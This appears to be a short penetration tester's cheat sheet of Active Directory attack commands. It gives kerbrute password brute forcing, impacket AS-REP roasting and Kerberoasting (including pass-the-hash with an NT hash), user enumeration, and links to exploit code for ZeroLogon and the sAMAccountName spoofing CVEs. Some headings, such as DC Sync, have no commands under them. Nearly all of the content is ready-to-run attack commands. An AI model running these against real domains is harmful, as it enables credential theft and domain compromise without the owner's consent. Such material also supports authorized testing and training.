AD attacks
User enumeration
User bruteforce password
kerbrute -d domain.local --dc $IP bruteuser /usr/share/seclists/Passwords/probable-v2-top12000.txt username
AS_REP Roasting
impacket-GetNPUsers domain.local/ -dc-ip $IP -usersfile users.txt -format hashcat -out asrep-roasting.txt
Get AD Users
impacket-GetADUsers -hashes ':11628d378a956b8ffc7e2c54b9a59574' 'domain.com/user' -dc-ip 10.10.10.10 -all
Get users description
Kerberoasting
- Also work with machine account :)
impacket-GetUserSPNs -hashes ':11628d378a956b8ffc7e2c54b9a59574' 'domain.com/user' -dc-ip 10.10.10.10 -request -outputfile kerberoasting.hash
- Kerberoasting without domain account
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
DC Sync
ZeroLogon
- check CVE-2020-1472 : https://github.com/SecuraBV/CVE-2020-1472
- exploit CVE-2020-1472 : https://github.com/dirkjanm/CVE-2020-1472
SAM The Admin
exploit CVE-2021-42278 and CVE-2021-42287 : https://github.com/WazeHell/sam-the-admin